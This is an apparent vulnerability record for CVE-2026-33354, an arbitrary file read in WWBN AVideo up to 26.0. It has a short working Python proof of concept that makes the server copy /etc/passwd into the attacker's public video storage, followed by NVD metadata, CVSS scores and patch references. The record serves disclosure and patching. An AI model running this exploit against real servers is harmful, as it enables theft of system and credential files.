CVE-2026-33354

import requests # PoC for CVE-2026-33354: AVideo Arbitrary File Read # Requires authentication (low privileges) target_host = "http://avideo.example.com" login_url = f"{target_host}/userLogin" upload_url = f"{target_host}/objects/aVideoEncoder.json.php" # Attacker credentials credentials = { "user": "attacker", "pass": "password" } # 1. Establish session session = requests.Session() session.post(login_url, data=credentials) # 2. Exploit vulnerable endpoint # The 'chunkFile' parameter accepts arbitrary local paths (e.g., /etc/passwd) # The server copies this file to the attacker's video directory. payload = { "chunkFile": "/etc/passwd", "action": "save" } response = session.post(upload_url, data=payload) if response.status_code == 200: print("[+] Exploit sent successfully.") print("[+] Check the attacker's video storage directory for the downloaded file.") else: print(f"[-] Exploit failed. Status code: {response.status_code}")

{"cve": {"id": "CVE-2026-33354", "sourceIdentifier": "[email protected]", "published": "2026-03-23T15:16:33.897", "lastModified": "2026-03-24T18:57:18.607", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, `POST /objects/aVideoEncoder.json.php` accepts a requester-controlled `chunkFile` parameter intended for staged upload chunks. Instead of restricting that path to trusted server-generated chunk locations, the endpoint accepts arbitrary local filesystem paths that pass `isValidURLOrPath()`. That helper allows files under broad server directories including `/var/www/`, the application root, cache, tmp, and `videos`, only rejecting `.php` files. For an authenticated uploader editing their own video, this becomes an arbitrary local file read. The endpoint copies the attacker-chosen local file into the attacker's public video storage path, after which it can be downloaded over HTTP. Commit 59bbd601a3f65a5b18c1d9e4eb11471c0a59214f contains a patch for the issue."}, {"lang": "es", "value": "WWBN AVideo es una plataforma de video de código abierto. En versiones hasta la 26.0 inclusive, `POST /objects/aVideoEncoder.json.php` acepta un parámetro `chunkFile` controlado por el solicitante, destinado a fragmentos de carga por etapas. En lugar de restringir esa ruta a ubicaciones de fragmentos generadas por el servidor de confianza, el endpoint acepta rutas arbitrarias del sistema de archivos local que pasan `isValidURLOrPath()`. Esa función auxiliar permite archivos bajo directorios amplios del servidor, incluyendo `/var/www/`, la raíz de la aplicación, caché, tmp, y `videos`, solo rechazando archivos `.php`. Para un cargador autenticado que edita su propio video, esto se convierte en una lectura arbitraria de archivos locales. El endpoint copia el archivo local elegido por el atacante en la ruta de almacenamiento de video público del atacante, después de lo cual puede ser descargado por HTTP. El commit 59bbd601a3f65a5b18c1d9e4eb11471c0a59214f contiene un parche para el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-73"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.0", "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/59bbd601a3f65a5b18c1d9e4eb11471c0a59214f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-4jw9-5hrc-m4j6", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}